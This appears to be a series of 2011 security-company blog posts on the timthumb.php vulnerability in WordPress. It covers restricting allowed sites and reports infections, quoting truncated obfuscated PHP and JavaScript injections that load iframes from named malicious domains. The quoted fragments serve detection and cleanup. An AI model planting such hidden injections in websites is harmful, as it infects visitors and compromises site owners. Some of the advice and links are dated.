By

Proper use and configuration of timthumb.php

With many themes using the timthumb.php and thumb.php files, we thought we should update our readers with the latest on timthumb.php.

First, make certain you have the latest:
http://timthumb.googlecode.com/svn/trunk/timthumb.php

As of this post, the current version is 2.8.9.

Open that file and inside you’ll this line to verify you have the correct version:

define (‘VERSION’, ‘2.8.9’);

Scroll down a few lines and you’ll:

if(! defined(‘ALLOW_EXTERNAL’) ) define (‘ALLOW_EXTERNAL’, TRUE); // Allow image fetching from external websites. Will check against ALLOWED_SITES if ALLOW_ALL_EXTERNAL_SITES is false

This means that if the ALLOW_EXTERNAL parameter is set to TRUE, like it is here, and the parameter ALL_ALL_EXTERNAL_SITES is false, then timthumb.php will check the included link to see if it’s in the list of ALLOW_SITES.

If you at the next line down in this file you’ll see:

if(! defined(‘ALLOW_ALL_EXTERNAL_SITES’) ) define (‘ALLOW_ALL_EXTERNAL_SITES’, false); // Less secure

With these 2 parameters set the way they are, timthumb.php will only show files from the list of ALLOWED_SITES. Next we need to examine the sites listed in ALLOWED_SITES.

Scroll down a few more lines and you’ll see:

// If ALLOW_EXTERNAL is true and ALLOW_ALL_EXTERNAL_SITES is false, then external images will only be fetched from these domains and their subdomains.
if(! isset($ALLOWED_SITES)){
$ALLOWED_SITES = array (
'flickr.com',
'staticflickr.com',
'picasa.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
'imgur.com',
'imageshack.us',
'tinypic.com',
'yourdomainhere',
);
}

Now in the line where we have: ‘yourdomainhere’ you would replace that with your website domain. For us, it would be ‘wewatchyourwebsite.com’. A few things to note here. If you don’t ever expect to load images from the other sites, then delete them as well while you’re in here.

What we’ve done is to allow timthumb.php to show files that are stored on your website and the locations above that. Any other domain will not be accepted and will not show. If you don’t do this, then hackers could include files from their websites and infect your website with their malicious code.

This version of timthumb.php does use a non-web folder for cache, so it is more secure, but configuring it this way adds another layer of protection to your site, and we do believe in defense in layers.

If you have questions about this information or you’re having trouble configuring it properly for your site, please post a comment and we’ll help you.

Thank you for reading.

By

The latest timthumb.php infection

We’ve been seeing, over the past week, many WordPress websites infected with this line of code:

function counter_wordpress() {$_F=__FILE__;$_X='...add_action('wp_head', 'counter_wordpress');

It’s in the wp-settings.php file and it usually has a series of blank spaces before it. You’ll find it right before the legitimate line of code:

do_action( 'init' );

This needs to be removed and you need to update all of your timthumb.php and thumb.php files. Then you’ll also have to scan your websites for backdoors.

Remember that if your WordPress site is hosted in a hosting account with many other websites in the same account, the backdoor can be in all or any of the other websites. You need to scan and clean them all.

If you need help in finding and removing this, please send us an email at: support@wewatchyourwebsite.com

Thank you.

And, let’s be safe out there.

By

More timthumb.php infections

I don’t like making every announcement of new infections regarding timthumb.php. It feels like everyone is pointing the finger at the author, but I do have to report the recent happenings, so here goes.

The latest website infections we’ve been seeing inject obfuscated script to the bottom of .html files and the index.php file.

The code looks like:

(opening script tag)String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q)...
n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h...eval(ss);(closing script tag)

We usually see this at the very bottom of the file. Typically after the closing html tag in an html file.

This code deobfuscates to an iframe that includes:

microsearchstat.com/temp/stat.php

As of this writing, Google does not find this URL suspicious, however:

What is the current listing status for microsearchstat.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-09-02, and the last time suspicious content was found on this site was on 2011-09-02.
Malicious software includes 1 trojan(s).

That is for today, September 2, 2011. Which is the same day that Google reports as the last time they found suspicious content.

Again, we’ve cleaned this on WordPress sites with vulnerable timthumb.php files. These really need to be updated.

If your website is listed as having malicious or suspicious content and it’s linked to microsearchstat.com, you might want to look for the code mentioned above.

If you need help cleaning this, please send us an email: support@wewatchyourwebsite.com or call us at (847)728-0214.

Have you spotted this on your website? Let us know…

By

Websites infected with googlesafebrowsing.com/kwizhveo.php

Here’s another round of infections from the timthumb.php vulnerability.

This time the hackers have registered a new domain: googlesafebrowsing.com (on August 17, 2011) and they are utilizing the timthumb.php and thumb.php files to infect websites.

In the header.php file, we’re finding code that begins with:

and continues down to:

if ( strpos ( $doms, ’||’ ) === false )
return false;
$domains = explode ( ’||’, trim ( $doms ) );
return $domains[array_rand ( $domains )];
}
?>

This is a dynamic piece of code in that it pulls a new domain from googlesafebrowsing.com/remoted.cc.txt and inserts it into an iframe that's embedded in a section of code that appears on your website. Most of the iframes have .us.to/kwizhveo.php in the URL.

You really should search your themes for any instance of timthumb.php or thumb.php and get the updated file: and replace the existing one.

What we recommend is that your use a safe FTP program like WS_FTP by Ipswitch, login to your website and search the wp-content/themes folder for any instances of timthumb.php or thumb.php. When you find one, rename it by adding .orig to the end of it. That way after adding the new file and testing, if your site doesn't work, you can always move back to the original (.orig) by deleting the new file and renaming the original by taking the .orig extension off.

If you have the thumb.php version it's normally about 18kb in size. If you want to make that file safe without replacing it, download it to your computer and open it with an editor.

Before you make any other changes check the file for code that looks like this:
infected thumb.php file

If you see that code, then your site is already infected and should be thoroughly cleaned. You should call us: (847)728-0214 or email: support@wewatchyourwebsite.com

However, if you don't see that code and want to modify your existing thumb.php file, scroll down to a section that looks like:

thumb file allowedSites

Change that by deleting the websites listed: flickr.com, picasa.com, etc.

When you're finished it should look like:

modified thumb.php allowedSites

The above steps will keep your site safe from the timthumb.php and thumb.php type of infections on your WordPress website - if you haven't had your WordPress site infected already.